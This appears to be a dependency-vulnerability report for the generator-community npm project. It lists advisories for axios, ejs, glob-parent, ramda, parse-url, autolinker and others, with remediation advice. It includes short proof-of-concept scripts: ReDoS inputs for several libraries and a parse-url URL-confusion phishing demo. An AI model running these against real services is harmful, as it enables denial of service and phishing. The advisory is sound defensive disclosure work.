  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data through the request configuration handling in the adapters/xhr.js adapter and helpers/resolveConfig.js‎. An attacker can force the withXSRFToken option to a truthy non-boolean value, or pollute Object.prototype.withXSRFToken, by supplying a crafted request config that causes the XSRF header to be sent on cross-origin requests. When withXSRFToken is treated as a generic truthy value, the same-origin check is bypassed, and the browser reads the XSRF cookie and attaches it to an attacker-controlled destination. This exposes the user's XSRF token to a cross-origin endpoint, potentially enabling request forgery against the victim's authenticated session.

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

medium severity

Improper Control of Dynamically-Managed Code Resources

  • Vulnerable module: ejs
  • Introduced through: yeoman-generator@2.0.0, generator-license@5.1.0 and others

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 mem-fs-editor@3.0.2 ejs@2.7.4
    Remediation: Upgrade to yeoman-generator@4.11.0.
  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 mem-fs-editor@3.0.2 ejs@2.7.4
    Remediation: Upgrade to generator-license@5.5.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 mem-fs-editor@3.0.2 ejs@2.7.4
    Remediation: Upgrade to generator-node@2.7.0.
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 ejs@2.7.4
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 mem-fs-editor@4.0.3 ejs@2.7.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 ejs@2.7.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 ejs@2.7.4
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 ejs@2.7.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 ejs@2.7.4

Overview

ejs is a popular JavaScript templating engine.

Affected versions of this package are vulnerable to Improper Control of Dynamically-Managed Code Resources due to the lack of certain pollution protection mechanisms. An attacker can exploit this vulnerability to manipulate object properties that should not be accessible or modifiable.

Note:

Even after updating to the fix version that adds enhanced protection against prototype pollution, it is still possible to override the hasOwnProperty method.

Remediation

Upgrade ejs to version 3.1.10 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: glob-parent
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 glob-parent@3.1.0
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 glob-parent@3.1.0
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 glob-parent@3.1.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 glob-parent@3.1.0
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 glob-parent@3.1.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 glob-parent@3.1.0
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 glob-parent@3.1.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 glob-parent@3.1.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 glob-parent@3.1.0
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 glob-parent@3.1.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 glob-parent@3.1.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 glob-parent@3.1.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 glob-parent@3.1.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 glob-parent@3.1.0

Overview

glob-parent is a package that helps extracting the non-magic parent path from a glob string.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The enclosure regex used to check for strings ending in enclosure containing path separator.

PoC by Yeting Li

var globParent = require("glob-parent")
function build_attack(n) {
var ret = "{"
for (var i = 0; i < n; i++) {
ret += "/"
}

return ret;
}

globParent(build_attack(5000));

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade glob-parent to version 5.1.2 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: http-cache-semantics
  • Introduced through: generator-node@2.2.0 and inquirer-npm-name@2.0.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 got@8.3.2 cacheable-request@2.1.4 http-cache-semantics@3.8.1
  • Introduced through: generator-community@commonality/generator-community inquirer-npm-name@2.0.0 npm-name@3.2.0 got@8.3.2 cacheable-request@2.1.4 http-cache-semantics@3.8.1
    Remediation: Upgrade to inquirer-npm-name@4.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 inquirer-npm-name@2.0.0 npm-name@3.2.0 got@8.3.2 cacheable-request@2.1.4 http-cache-semantics@3.8.1

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library.

PoC

Run the following script in Node.js after installing the http-cache-semantics NPM package:

const CachePolicy = require("http-cache-semantics");

for (let i = 0; i <= 5; i++) {

const attack = "a" + " ".repeat(i * 7000) +
"z";

const start = performance.now();
new CachePolicy({
headers: {},
}, {
headers: {
"cache-control": attack,
},


});
console.log(`${attack.length}: ${performance.now() - start}ms`);
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade http-cache-semantics to version 4.1.1 or higher.

References

medium severity

Inefficient Regular Expression Complexity

  • Vulnerable module: micromatch
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10

Overview

Affected versions of this package are vulnerable to Inefficient Regular Expression Complexity due to the use of unsafe pattern configurations that allow greedy matching through the micromatch.braces() function. An attacker can cause the application to hang or slow down by passing a malicious payload that triggers extensive backtracking in regular expression processing.

Remediation

Upgrade micromatch to version 4.0.8 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: ramda
  • Introduced through: generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 ramda@0.25.0

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the trim function with specially crafted input, causing an application to consume an large amounts of CPU.

PoC

var {trim} = require("ramda");

function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}

return ret + "1";
}

var time = Date.now();
trim(build_blank(50000))
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost)

Output: time_cost: 2639

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade ramda to version 0.27.2 or higher.

References

medium severity

Improper Input Validation

  • Vulnerable module: parse-url
  • Introduced through: git-url-parse@7.0.1

Detailed paths

  • Introduced through: generator-community@commonality/generator-community git-url-parse@7.0.1 git-up@2.1.0 parse-url@3.0.2
    Remediation: Upgrade to git-url-parse@13.0.0.

Overview

parse-url is an An advanced url parser supporting git urls too.

Affected versions of this package are vulnerable to Improper Input Validation due to incorrect parsing of URLs. This allows the attacker to craft a malformed URL which can lead to a phishing attack.


const parseUrl = require("parse-url");
const Url = require("url");

const express = require('express');
const app = express();

var url = "https://www.google.com:x@fakesite.com:x";
parsed = parseUrl(url);
console.log("[*]`parse-url` output: ")
console.log(parsed);

parsed2 = Url.parse(url);
console.log("[*]`url` output: ")
console.log(parsed2)

app.get('/', (req, res) => {
    if (parsed.host == "www.google.com") {
        res.send("<a href=\'" + parsed2.href + "\'>CLICK ME!</a>")
    }
})

app.listen(8888,"0.0.0.0");

Remediation

Upgrade parse-url to version 8.1.0 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: autolinker
  • Introduced through: markdown-magic@0.1.18

Detailed paths

  • Introduced through: generator-community@commonality/generator-community markdown-magic@0.1.18 markdown-toc@1.2.0 remarkable@1.7.4 autolinker@0.28.1

Overview

autolinker is an Utility to Automatically Link URLs, Email Addresses, Phone Numbers, Twitter handles, and Hashtags in a given block of text/HTML.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to an unterminated img src.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade autolinker to version 3.0.0 or higher.

References

medium severity

Information Exposure

  • Vulnerable module: parse-url
  • Introduced through: git-url-parse@7.0.1

Detailed paths

  • Introduced through: generator-community@commonality/generator-community git-url-parse@7.0.1 git-up@2.1.0 parse-url@3.0.2
    Remediation: Upgrade to git-url-parse@11.0.0.

Overview

parse-url is an An advanced url parser supporting git urls too.

Affected versions of this package are vulnerable to Information Exposure due to improper validation.

Remediation

Upgrade parse-url to version 6.0.1 or higher.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: autolinker
  • Introduced through: markdown-magic@0.1.18

Detailed paths

  • Introduced through: generator-community@commonality/generator-community markdown-magic@0.1.18 markdown-toc@1.2.0 remarkable@1.7.4 autolinker@0.28.1

Overview

autolinker is an Utility to Automatically Link URLs, Email Addresses, Phone Numbers, Twitter handles, and Hashtags in a given block of text/HTML.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to it not sanitizing user input passed to the innerHTML tags.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade autolinker to version 3.14.0 or higher.

References

medium severity

Artistic-2.0 license

  • Module: binaryextensions
  • Introduced through: generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 mem-fs-editor@9.7.0 binaryextensions@4.19.0

Artistic-2.0 license